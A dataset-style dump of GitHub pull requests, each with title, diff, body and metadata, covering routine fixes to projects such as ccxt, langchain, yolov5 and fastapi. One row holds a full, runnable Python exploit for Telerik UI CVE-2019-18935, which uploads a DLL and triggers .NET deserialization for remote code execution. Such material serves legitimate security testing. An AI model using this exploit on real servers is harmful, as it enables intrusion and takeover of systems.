title
stringlengths
2
169
diff
stringlengths
235
19.5k
body
stringlengths
0
30.5k
url
stringlengths
48
84
created_at
stringlengths
20
20
closed_at
stringlengths
20
20
merged_at
stringlengths
20
20
updated_at
stringlengths
20
20
diff_len
float64
101
3.99k
repo_name
stringclasses
83 values
__index_level_0__
int64
15
52.7k
coinbasepro: remove deprecated market fields
diff --git a/js/coinbasepro.js b/js/coinbasepro.js index 13e686a2be8f..93ff48a64e38 100644 --- a/js/coinbasepro.js +++ b/js/coinbasepro.js @@ -391,8 +391,8 @@ module.exports = class coinbasepro extends Exchange { 'max': undefined, }, 'amount': { - 'min': this.safeNumber (market, 'base_min_size'), - 'max': this.safeNumber (market, 'base_max_size'), + 'min': undefined, + 'max': undefined, }, 'price': { 'min': undefined, @@ -400,7 +400,7 @@ module.exports = class coinbasepro extends Exchange { }, 'cost': { 'min': this.safeNumber (market, 'min_market_funds'), - 'max': this.safeNumber (market, 'max_market_funds'), + 'max': undefined, }, }, 'info': market,
fixes #14013
https://api.github.com/repos/ccxt/ccxt/pulls/14015
2022-06-22T13:53:43Z
2022-06-22T16:29:59Z
2022-06-22T16:29:58Z
2022-06-22T16:29:59Z
228
ccxt/ccxt
13,848
[tutorial] add video link
diff --git a/examples/tutorial/README.md b/examples/tutorial/README.md index 633e2f5a7c96..9de1cdfdc31d 100644 --- a/examples/tutorial/README.md +++ b/examples/tutorial/README.md @@ -20,13 +20,13 @@ quickly deploy large AI model training and inference, reducing large AI model tr ## Table of Content - - Multi-dimensional Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/hybrid_parallel) - - Sequence Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/sequence_parallel) - - Large Batch Training Optimization [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/large_batch_optimizer) - - Automatic Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/auto_parallel) - - Fine-tuning and Inference for OPT [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/opt) - - Optimized AlphaFold [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/fastfold) - - Optimized Stable Diffusion [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion) + - Multi-dimensional Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/hybrid_parallel) [[video]](https://www.youtube.com/watch?v=OwUQKdA2Icc) + - Sequence Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/sequence_parallel) [[video]](https://www.youtube.com/watch?v=HLLVKb7Cszs) + - Large Batch Training Optimization [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/large_batch_optimizer) [[video]](https://www.youtube.com/watch?v=9Un0ktxJZbI) + - Automatic Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/auto_parallel) [[video]](https://www.youtube.com/watch?v=_-2jlyidxqE) + - Fine-tuning and Inference for OPT [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/opt) [[video]](https://www.youtube.com/watch?v=jbEFNVzl67Y) + - Optimized AlphaFold [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/fastfold) [[video]](https://www.youtube.com/watch?v=-zP13LfJP7w) + - Optimized Stable Diffusion [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion) [[video]](https://www.youtube.com/watch?v=8KHeUjjc-XQ) ## Discussion @@ -37,7 +37,7 @@ If you think there is a need to discuss anything, you may jump to our [Slack](ht If you encounter any problem while running these tutorials, you may want to raise an [issue](https://github.com/hpcaitech/ColossalAI/issues/new/choose) in this repository. ## 🛠️ Setup environment -You should use `conda` to create a virtual environment, we recommend **python 3.8**, e.g. `conda create -n colossal python=3.8`. This installation commands are for CUDA 11.3, if you have a different version of CUDA, please download PyTorch and Colossal-AI accordingly. +[[video]](https://www.youtube.com/watch?v=dpMYj974ZIc) You should use `conda` to create a virtual environment, we recommend **python 3.8**, e.g. `conda create -n colossal python=3.8`. This installation commands are for CUDA 11.3, if you have a different version of CUDA, please download PyTorch and Colossal-AI accordingly. ``` # install torch
## 📌 Checklist before creating the PR - [ ] I have created an issue for this PR for traceability - [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description` - [ ] I have added relevant tags if possible for us to better distinguish different PRs ## 🚨 Issue number > Link this PR to your issue with words like fixed to automatically close the linked issue upon merge > > e.g. `fixed #1234`, `closed #1234`, `resolved #1234` ## 📝 What does this PR do? > Summarize your work here. > if you have any plots/diagrams/screenshots/tables, please attach them here. ## 💥 Checklist before requesting a review - [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue)) - [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible - [ ] I have performed a self-review of my code - [ ] I have added thorough tests. - [ ] I have added docstrings for all the functions/methods I implemented ## ⭐️ Do you enjoy contributing to Colossal-AI? - [ ] 🌝 Yes, I do. - [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2619
2023-02-07T07:11:50Z
2023-02-07T07:14:52Z
2023-02-07T07:14:51Z
2023-02-07T07:14:56Z
901
hpcaitech/ColossalAI
11,142
Do not pass over the `session` argument to `Session.request` method
diff --git a/requests/api.py b/requests/api.py index 8ff22e7baa..40966cf350 100644 --- a/requests/api.py +++ b/requests/api.py @@ -34,7 +34,7 @@ def request(method, url, **kwargs): :param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided. """ - s = kwargs.get('session') or sessions.session() + s = kwargs.pop('session') if 'session' in kwargs else sessions.session() return s.request(method=method, url=url, **kwargs)
The `request` method of `Session` class does not take a `session` argument. But `api.request` does. So, it has to be popped before you can send the whole `kwargs` dict to `Session.request` method.
https://api.github.com/repos/psf/requests/pulls/344
2012-01-09T05:47:35Z
2012-01-10T19:11:01Z
2012-01-10T19:11:01Z
2021-09-08T13:06:10Z
145
psf/requests
32,300
Updating the docstring disable_env_checker
diff --git a/gym/envs/registration.py b/gym/envs/registration.py index 8b7a2ac83b8..5b9c8a4fd30 100644 --- a/gym/envs/registration.py +++ b/gym/envs/registration.py @@ -126,7 +126,7 @@ class EnvSpec: * max_episode_steps: The max number of steps that the environment can take before truncation * order_enforce: If to enforce the order of `reset` before `step` and `render` functions * autoreset: If to automatically reset the environment on episode end - * disable_env_checker: If to disable the environment checker wrapper by default in `gym.make` + * disable_env_checker: If to disable the environment checker wrapper in `gym.make`, by default False (runs the environment checker) * kwargs: Additional keyword arguments passed to the environments through `gym.make` """ @@ -558,8 +558,9 @@ def make( max_episode_steps: Maximum length of an episode (TimeLimit wrapper). autoreset: Whether to automatically reset the environment after each episode (AutoResetWrapper). new_step_api: Whether to use old or new step API (StepAPICompatibility wrapper). Will be removed at v1.0 - disable_env_checker: If to run the env checker, None will default to the environment `spec.disable_env_checker` - (that is by default True), otherwise will run according to the parameter (True = not run, False = run) + disable_env_checker: If to run the env checker, None will default to the environment specification `disable_env_checker` + (which is by default False, running the environment checker), + otherwise will run according to this parameter (`True` = not run, `False` = run) kwargs: Additional arguments to pass to the environment constructor. Returns: diff --git a/gym/vector/__init__.py b/gym/vector/__init__.py index 185082715c8..3dc4998fa8d 100644 --- a/gym/vector/__init__.py +++ b/gym/vector/__init__.py @@ -35,9 +35,10 @@ def make( num_envs: Number of copies of the environment. asynchronous: If `True`, wraps the environments in an :class:`AsyncVectorEnv` (which uses `multiprocessing`_ to run the environments in parallel). If ``False``, wraps the environments in a :class:`SyncVectorEnv`. wrappers: If not ``None``, then apply the wrappers to each internal environment during creation. - disable_env_checker: If to disable the env checker, if True it will only run on the first environment created. + disable_env_checker: If to run the env checker for the first environment only. None will default to the environment spec `disable_env_checker` parameter + (that is by default False), otherwise will run according to this argument (True = not run, False = run) new_step_api: If True, the vector environment's step method outputs two booleans `terminated`, `truncated` instead of one `done`. - **kwargs: Keywords arguments applied during gym.make + **kwargs: Keywords arguments applied during `gym.make` Returns: The vectorized environment. diff --git a/gym/vector/vector_env.py b/gym/vector/vector_env.py index ad2710e02ae..3ca4663d822 100644 --- a/gym/vector/vector_env.py +++ b/gym/vector/vector_env.py @@ -36,7 +36,7 @@ def __init__( num_envs: Number of environments in the vectorized environment. observation_space: Observation space of a single environment. action_space: Action space of a single environment. - new_step_api (bool): Whether the vector env's step method outputs two boolean arrays (new API) or one boolean array (old API) + new_step_api (bool): Whether the vector environment's step method outputs two boolean arrays (new API) or one boolean array (old API) """ self.num_envs = num_envs self.is_vector_env = True @@ -54,8 +54,7 @@ def __init__( self.new_step_api = new_step_api if not self.new_step_api: deprecation( - "Initializing vector env in old step API which returns one bool array instead of two. " - "It is recommended to set `new_step_api=True` to use new step API. This will be the default behaviour in future. " + "Initializing vector env in old step API which returns one bool array instead of two. It is recommended to set `new_step_api=True` to use new step API. This will be the default behaviour in future." ) def reset_async( @@ -147,7 +146,7 @@ def step(self, actions): actions: element of :attr:`action_space` Batch of actions. Returns: - Batch of (observations, rewards, terminateds, truncateds, infos) or (observations, rewards, dones, infos) + Batch of (observations, rewards, terminated, truncated, infos) or (observations, rewards, dones, infos) """ self.step_async(actions) return self.step_wait()
Address the comment in https://github.com/openai/gym/commit/519dfd9117e98e4f52d38064d2b0f79974fb676d
https://api.github.com/repos/openai/gym/pulls/2967
2022-07-14T21:59:09Z
2022-07-17T20:50:40Z
2022-07-17T20:50:40Z
2022-07-17T20:50:40Z
1,144
openai/gym
5,457
update det_r50_vd_sast_totaltext.yml
diff --git a/configs/det/det_r50_vd_sast_totaltext.yml b/configs/det/det_r50_vd_sast_totaltext.yml index a92f1b6e53..e040c4207e 100755 --- a/configs/det/det_r50_vd_sast_totaltext.yml +++ b/configs/det/det_r50_vd_sast_totaltext.yml @@ -62,7 +62,7 @@ Train: name: SimpleDataSet data_dir: ./train_data/ label_file_list: [./train_data/art_latin_icdar_14pt/train_no_tt_test/train_label_json.txt, ./train_data/total_text_icdar_14pt/train_label_json.txt] - data_ratio_list: [0.5, 0.5] + ratio_list: [0.5, 0.5] transforms: - DecodeImage: # load image img_mode: BGR
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/1573
2020-12-24T09:18:18Z
2020-12-24T09:21:12Z
2020-12-24T09:21:12Z
2020-12-24T09:21:13Z
211
PaddlePaddle/PaddleOCR
42,550
fix: incorrect prompt type breaking gptme benchmarks
diff --git a/gpt_engineer/benchmark/benchmarks/gptme/load.py b/gpt_engineer/benchmark/benchmarks/gptme/load.py index b845f7dca0..216c7c44db 100644 --- a/gpt_engineer/benchmark/benchmarks/gptme/load.py +++ b/gpt_engineer/benchmark/benchmarks/gptme/load.py @@ -12,6 +12,7 @@ """ from gpt_engineer.benchmark.types import Benchmark, Task from gpt_engineer.core.files_dict import FilesDict +from gpt_engineer.core.prompt import Prompt def load_gptme(): @@ -30,7 +31,7 @@ def load_gptme(): name="hello", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="python hello.py", - prompt="Change the code in hello.py to print 'Hello, human!'", + prompt=Prompt("Change the code in hello.py to print 'Hello, human!'"), assertions={ "correct output": lambda assertable: assertable.stdout == "Hello, human!\n", @@ -44,7 +45,7 @@ def load_gptme(): name="hello-patch", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="python hello.py", - prompt="Patch the code in hello.py to print 'Hello, human!'", + prompt=Prompt("Patch the code in hello.py to print 'Hello, human!'"), assertions={ "correct output": lambda assertable: assertable.stdout == "Hello, human!\n", @@ -58,7 +59,9 @@ def load_gptme(): name="hello-ask", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="echo 'Erik' | python hello.py", - prompt="modify hello.py to ask the user for their name and print 'Hello, <name>!'. don't try to execute it", + prompt=Prompt( + "modify hello.py to ask the user for their name and print 'Hello, <name>!'. don't try to execute it" + ), assertions={ "correct output": lambda assertable: "Hello, Erik!" in assertable.stdout, @@ -70,7 +73,9 @@ def load_gptme(): {} ), # Empty dictionary since no initial code is provided command="python prime.py", - prompt="write a script prime.py that computes and prints the 100th prime number", + prompt=Prompt( + "write a script prime.py that computes and prints the 100th prime number" + ), assertions={ "correct output": lambda assertable: "541" in assertable.stdout.split(), @@ -82,7 +87,9 @@ def load_gptme(): {} ), # Empty dictionary since no initial code is provided command="git status", - prompt="initialize a git repository, write a main.py file, and commit it", + prompt=Prompt( + "initialize a git repository, write a main.py file, and commit it" + ), assertions={ "clean exit": lambda assertable: assertable.process.returncode == 0, "clean working tree": lambda assertable: "nothing to commit, working tree clean"
The gptme benchmarking suite uses strings for prompts which causes an error because `agent#improve` assumes it's a `Prompt` object.
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/1096
2024-04-01T11:19:07Z
2024-04-02T23:37:22Z
2024-04-02T23:37:22Z
2024-04-02T23:37:22Z
743
gpt-engineer-org/gpt-engineer
33,166
Fix openai extension script.py - TypeError: '_Environ' object is not …
diff --git a/extensions/openai/script.py b/extensions/openai/script.py index 582479172e..f937338522 100644 --- a/extensions/openai/script.py +++ b/extensions/openai/script.py @@ -8,7 +8,7 @@ from modules.text_generation import encode, generate_reply params = { - 'port': int(os.environ('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001, + 'port': int(os.environ.get('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001, } debug = True if 'OPENEDAI_DEBUG' in os.environ else False
…callable Fixes the following issue: Traceback (most recent call last): File "text-generation-webui/modules/extensions.py", line 33, in load_extensions exec(f"import extensions.{name}.script") File "<string>", line 1, in <module> File "text-generation-webui/extensions/openai/script.py", line 11, in <module> 'port': int(os.environ('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001, TypeError: '_Environ' object is not callable
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1753
2023-05-03T06:06:02Z
2023-05-03T12:51:49Z
2023-05-03T12:51:49Z
2023-05-03T12:51:49Z
148
oobabooga/text-generation-webui
26,777
Add trace_as_chain_group metadata
diff --git a/libs/core/langchain_core/callbacks/manager.py b/libs/core/langchain_core/callbacks/manager.py index e216f479832ac6..b1f103871f1318 100644 --- a/libs/core/langchain_core/callbacks/manager.py +++ b/libs/core/langchain_core/callbacks/manager.py @@ -67,6 +67,7 @@ def trace_as_chain_group( example_id: Optional[Union[str, UUID]] = None, run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, + metadata: Optional[Dict[str, Any]] = None, ) -> Generator[CallbackManagerForChainGroup, None, None]: """Get a callback manager for a chain group in a context manager. Useful for grouping different calls together as a single run even if @@ -83,6 +84,8 @@ def trace_as_chain_group( run_id (UUID, optional): The ID of the run. tags (List[str], optional): The inheritable tags to apply to all runs. Defaults to None. + metadata (Dict[str, Any], optional): The metadata to apply to all runs. + Defaults to None. Note: must have LANGCHAIN_TRACING_V2 env var set to true to see the trace in LangSmith. @@ -95,7 +98,7 @@ def trace_as_chain_group( llm_input = "Foo" with trace_as_chain_group("group_name", inputs={"input": llm_input}) as manager: # Use the callback manager for the chain group - res = llm.predict(llm_input, callbacks=manager) + res = llm.invoke(llm_input, {"callbacks": manager}) manager.on_chain_end({"output": res}) """ # noqa: E501 from langchain_core.tracers.context import _get_trace_callbacks @@ -106,6 +109,7 @@ def trace_as_chain_group( cm = CallbackManager.configure( inheritable_callbacks=cb, inheritable_tags=tags, + inheritable_metadata=metadata, ) run_manager = cm.on_chain_start({"name": group_name}, inputs or {}, run_id=run_id) @@ -141,6 +145,7 @@ async def atrace_as_chain_group( example_id: Optional[Union[str, UUID]] = None, run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, + metadata: Optional[Dict[str, Any]] = None, ) -> AsyncGenerator[AsyncCallbackManagerForChainGroup, None]: """Get an async callback manager for a chain group in a context manager. Useful for grouping different async calls together as a single run even if @@ -157,6 +162,8 @@ async def atrace_as_chain_group( run_id (UUID, optional): The ID of the run. tags (List[str], optional): The inheritable tags to apply to all runs. Defaults to None. + metadata (Dict[str, Any], optional): The metadata to apply to all runs. + Defaults to None. Returns: AsyncCallbackManager: The async callback manager for the chain group. @@ -168,7 +175,7 @@ async def atrace_as_chain_group( llm_input = "Foo" async with atrace_as_chain_group("group_name", inputs={"input": llm_input}) as manager: # Use the async callback manager for the chain group - res = await llm.apredict(llm_input, callbacks=manager) + res = await llm.ainvoke(llm_input, {"callbacks": manager}) await manager.on_chain_end({"output": res}) """ # noqa: E501 from langchain_core.tracers.context import _get_trace_callbacks @@ -176,7 +183,9 @@ async def atrace_as_chain_group( cb = _get_trace_callbacks( project_name, example_id, callback_manager=callback_manager ) - cm = AsyncCallbackManager.configure(inheritable_callbacks=cb, inheritable_tags=tags) + cm = AsyncCallbackManager.configure( + inheritable_callbacks=cb, inheritable_tags=tags, inheritable_metadata=metadata + ) run_manager = await cm.on_chain_start( {"name": group_name}, inputs or {}, run_id=run_id
https://api.github.com/repos/langchain-ai/langchain/pulls/17187
2024-02-07T17:22:36Z
2024-02-07T17:42:44Z
2024-02-07T17:42:44Z
2024-02-07T17:42:45Z
936
langchain-ai/langchain
43,509
`export.py` return exported files/dirs
diff --git a/export.py b/export.py index 2e90b0a1b24..a7a79b46b8b 100644 --- a/export.py +++ b/export.py @@ -434,16 +434,17 @@ def run(data=ROOT / 'data/coco128.yaml', # 'dataset.yaml path' LOGGER.info(f"\n{colorstr('PyTorch:')} starting from {file} ({file_size(file):.1f} MB)") # Exports + f = [''] * 10 # exported filenames if 'torchscript' in include: - f = export_torchscript(model, im, file, optimize) + f[0] = export_torchscript(model, im, file, optimize) if 'engine' in include: # TensorRT required before ONNX - f = export_engine(model, im, file, train, half, simplify, workspace, verbose) + f[1] = export_engine(model, im, file, train, half, simplify, workspace, verbose) if ('onnx' in include) or ('openvino' in include): # OpenVINO requires ONNX - f = export_onnx(model, im, file, opset, train, dynamic, simplify) + f[2] = export_onnx(model, im, file, opset, train, dynamic, simplify) if 'openvino' in include: - f = export_openvino(model, im, file) + f[3] = export_openvino(model, im, file) if 'coreml' in include: - _, f = export_coreml(model, im, file) + _, f[4] = export_coreml(model, im, file) # TensorFlow Exports if any(tf_exports): @@ -451,25 +452,27 @@ def run(data=ROOT / 'data/coco128.yaml', # 'dataset.yaml path' if int8 or edgetpu: # TFLite --int8 bug https://github.com/ultralytics/yolov5/issues/5707 check_requirements(('flatbuffers==1.12',)) # required before `import tensorflow` assert not (tflite and tfjs), 'TFLite and TF.js models must be exported separately, please pass only one type.' - model, f = export_saved_model(model, im, file, dynamic, tf_nms=nms or agnostic_nms or tfjs, - agnostic_nms=agnostic_nms or tfjs, topk_per_class=topk_per_class, - topk_all=topk_all, conf_thres=conf_thres, iou_thres=iou_thres) # keras model + model, f[5] = export_saved_model(model, im, file, dynamic, tf_nms=nms or agnostic_nms or tfjs, + agnostic_nms=agnostic_nms or tfjs, topk_per_class=topk_per_class, + topk_all=topk_all, conf_thres=conf_thres, iou_thres=iou_thres) # keras model if pb or tfjs: # pb prerequisite to tfjs - f = export_pb(model, im, file) + f[6] = export_pb(model, im, file) if tflite or edgetpu: - f = export_tflite(model, im, file, int8=int8 or edgetpu, data=data, ncalib=100) + f[7] = export_tflite(model, im, file, int8=int8 or edgetpu, data=data, ncalib=100) if edgetpu: - f = export_edgetpu(model, im, file) + f[8] = export_edgetpu(model, im, file) if tfjs: - f = export_tfjs(model, im, file) + f[9] = export_tfjs(model, im, file) # Finish + f = [str(x) for x in f if x] # filter out '' and None LOGGER.info(f'\nExport complete ({time.time() - t:.2f}s)' f"\nResults saved to {colorstr('bold', file.parent.resolve())}" f"\nVisualize with https://netron.app" - f"\nDetect with `python detect.py --weights {f}`" - f" or `model = torch.hub.load('ultralytics/yolov5', 'custom', '{f}')" - f"\nValidate with `python val.py --weights {f}`") + f"\nDetect with `python detect.py --weights {f[-1]}`" + f" or `model = torch.hub.load('ultralytics/yolov5', 'custom', '{f[-1]}')" + f"\nValidate with `python val.py --weights {f[-1]}`") + return f # return list of exported files/dirs def parse_opt():
@kalenmike updates export.py's `run()` function to return an array of all exported files, i.e.: ```python python export.py --include torchscript onnx Out[4]: ['yolov5s.torchscript', 'yolov5s.onnx'] ``` ## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Improved model export file management in Ultralytics YOLOv5. ### 📊 Key Changes - Introduced an array `f` to store exported filenames for different model formats. - Assigned export function outputs for TorchScript, TensorRT, ONNX, OpenVINO, CoreML, TensorFlow SavedModel, TensorFlow Lite, Edge TPU, and TensorFlow.js to specific indices in `f`. - Updated file path management to filter out empty or None values, ensuring only valid paths are processed. - Changed the detection and validation command outputs to use the last exported model file. ### 🎯 Purpose & Impact - 🚀 **Purpose**: To streamline the handling of multiple model exports by organizing the exported filenames into a structured array, making the process more robust and maintainable. - 📈 **Impact**: Users will experience more clarity on the output of exported files and benefit from a simpler way to reference these files for subsequent tasks like detection and validation. It reduces the potential for errors and confusion when working with multiple export formats.
https://api.github.com/repos/ultralytics/yolov5/pulls/6343
2022-01-19T00:50:51Z
2022-01-19T01:18:24Z
2022-01-19T01:18:24Z
2024-01-19T13:27:27Z
1,110
ultralytics/yolov5
25,224
✏ Fix typo in `docs/en/docs/help-fastapi.md`
diff --git a/docs/en/docs/help-fastapi.md b/docs/en/docs/help-fastapi.md index 394bccab73e2a..8d8d708ed902e 100644 --- a/docs/en/docs/help-fastapi.md +++ b/docs/en/docs/help-fastapi.md @@ -121,7 +121,7 @@ Have in mind that as chats allow more "free conversation", it's easy to ask ques In GitHub issues the template will guide you to write the right question so that you can more easily get a good answer, or even solve the problem yourself even before asking. And in GitHub I can make sure I always answer everything, even if it takes some time. I can't personally do that with the chat systems. 😅 -Conversations in the chat systems are also not as easily searchable as in GitHub, so questions and answers might get lost in the conversation. And only the ones in GitHub issues count to become a [FastAPI Expert](fastapi-people.md#experts){.internal-link target=_blank}, so you will most probably receive more attention in GitHub isssues. +Conversations in the chat systems are also not as easily searchable as in GitHub, so questions and answers might get lost in the conversation. And only the ones in GitHub issues count to become a [FastAPI Expert](fastapi-people.md#experts){.internal-link target=_blank}, so you will most probably receive more attention in GitHub issues. On the other side, there are thousands of users in the chat systems, so there's a high chance you'll find someone to talk to there, almost all the time. 😄
line 124 isssues to issues
https://api.github.com/repos/tiangolo/fastapi/pulls/3760
2021-08-25T02:49:15Z
2021-10-07T14:22:16Z
2021-10-07T14:22:16Z
2021-10-07T14:22:16Z
345
tiangolo/fastapi
23,274
Add Hebrew Calendar API
diff --git a/README.md b/README.md index a793844dbd..1d79d9d434 100644 --- a/README.md +++ b/README.md @@ -124,6 +124,7 @@ API | Description | Auth | HTTPS | Link | | Church Calendar | Catholic liturgical calendar | No | No | [Go!](http://calapi.inadiutorium.cz/) | | Czech Namedays Calendar | Lookup for a name and returns nameday date | No | No | [Go!](http://svatky.adresa.info/) | | Google Calendar | Display, create and modify Google calendar events | `OAuth` | Yes | [Go!](https://developers.google.com/google-apps/calendar/) | +| Hebrew Calendar | Convert between Gregarian and Hebrew, fetch Shabbat and Holiday times, etc. | No | No | [Go!](https://www.hebcal.com/home/developer-apis) | | Holidays | Historical data regarding holidays | `apiKey` | Yes | [Go!](https://holidayapi.com/) | | LectServe | Protestant liturgical calendar | No | No | [Go!](http://www.lectserve.com) | | Non-Working Days | Database of ICS files for non working days | No | Yes | [Go!](https://github.com/gadael/icsdb) |
Adds hebcal.com API to the list Thank you for taking the time to work on a Pull Request for this project! To ensure your PR is dealt with swiftly please check the following: - [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md). - [x] Your changes are made in the [README](../README.md) file, not the auto-generated JSON. - [x] Your additions are ordered alphabetically. - [x] Your submission has a useful description. - [x] Each table column should be padded with one space on either side. - [x] You have searched the repository for any relevant issues or PRs.
https://api.github.com/repos/public-apis/public-apis/pulls/547
2017-11-15T16:24:47Z
2017-11-15T16:30:26Z
2017-11-15T16:30:26Z
2017-11-15T18:36:10Z
291
public-apis/public-apis
35,680
add Telerik CVE-2019-18935
diff --git a/CVE Exploits/Telerik CVE-2019-18935.py b/CVE Exploits/Telerik CVE-2019-18935.py new file mode 100644 index 0000000000..b255351313 --- /dev/null +++ b/CVE Exploits/Telerik CVE-2019-18935.py @@ -0,0 +1,140 @@ +#!/usr/bin/env python3 +# origin : https://github.com/noperator/CVE-2019-18935 +# INSTALL: +# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 +# python3 -m venv env +# source env/bin/activate +# pip3 install -r requirements.txt + +# Import encryption routines. +from sys import path +path.insert(1, 'RAU_crypto') +from RAU_crypto import RAUCipher + +from argparse import ArgumentParser +from json import dumps, loads +from os.path import basename, splitext +from pprint import pprint +from requests import post +from requests.packages.urllib3 import disable_warnings +from sys import stderr +from time import time +from urllib3.exceptions import InsecureRequestWarning + +disable_warnings(category=InsecureRequestWarning) + +def send_request(files): + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0', + 'Connection': 'close', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Upgrade-Insecure-Requests': '1' + } + response = post(url, files=files, verify=False, headers=headers) + try: + result = loads(response.text) + result['metaData'] = loads(RAUCipher.decrypt(result['metaData'])) + pprint(result) + except: + print(response.text) + +def build_raupostdata(object, type): + return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type) + +def upload(): + + # Build rauPostData. + object = { + 'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version), + 'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version), + 'MaxFileSize': 0, + 'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk. + 'Ticks': 1440000000000, + 'Days': 0, + 'Hours': 40, + 'Minutes': 0, + 'Seconds': 0, + 'Milliseconds': 0, + 'TotalDays': 1.6666666666666666, + 'TotalHours': 40, + 'TotalMinutes': 2400, + 'TotalSeconds': 144000, + 'TotalMilliseconds': 144000000 + }, + 'UseApplicationPoolImpersonation': False + } + type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4' + raupostdata = build_raupostdata(object, type) + + with open(filename_local, 'rb') as f: + payload = f.read() + + metadata = { + 'TotalChunks': 1, + 'ChunkIndex': 0, + 'TotalFileSize': 1, + 'UploadID': filename_remote # Determines remote filename on disk. + } + + # Build multipart form data. + files = { + 'rauPostData': (None, raupostdata), + 'file': (filename_remote, payload, 'application/octet-stream'), + 'fileName': (None, filename_remote), + 'contentType': (None, 'application/octet-stream'), + 'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'), + 'metadata': (None, dumps(metadata)) + } + + # Send request. + print('[*] Local payload name: ', filename_local, file=stderr) + print('[*] Destination folder: ', temp_target_folder, file=stderr) + print('[*] Remote payload name:', filename_remote, file=stderr) + print(file=stderr) + send_request(files) + +def deserialize(): + + # Build rauPostData. + object = { + 'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote + } + type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' + raupostdata = build_raupostdata(object, type) + + # Build multipart form data. + files = { + 'rauPostData': (None, raupostdata), # Only need this now. + '': '' # One extra input is required for the page to process the request. + } + + # Send request. + print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr) + start = time() + send_request(files) + end = time() + print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr) + +if __name__ == '__main__': + parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.') + parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln") + parser.add_argument('-v', dest='ui_version', required=True, help='software version') + parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version') + parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL') + parser.add_argument('-f', dest='folder', required=True, help='destination folder on target') + parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau') + args = parser.parse_args() + + temp_target_folder = args.folder.replace('/', '\\') + ui_version = args.ui_version + net_version = args.net_version + filename_local = args.payload + filename_remote = str(time()) + splitext(basename(filename_local))[1] + url = args.url + + upload() + + if not args.test_upload: + deserialize() +
Adding Telerik exploit for CVE-2019-18935 that is being actively exploited everywhere insecure versions of Telerik are found.
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/151
2020-01-27T15:59:55Z
2020-01-27T19:13:29Z
2020-01-27T19:13:29Z
2020-01-27T19:13:29Z
1,603
swisskyrepo/PayloadsAllTheThings
8,411
[tipc] fix some wrong data dir
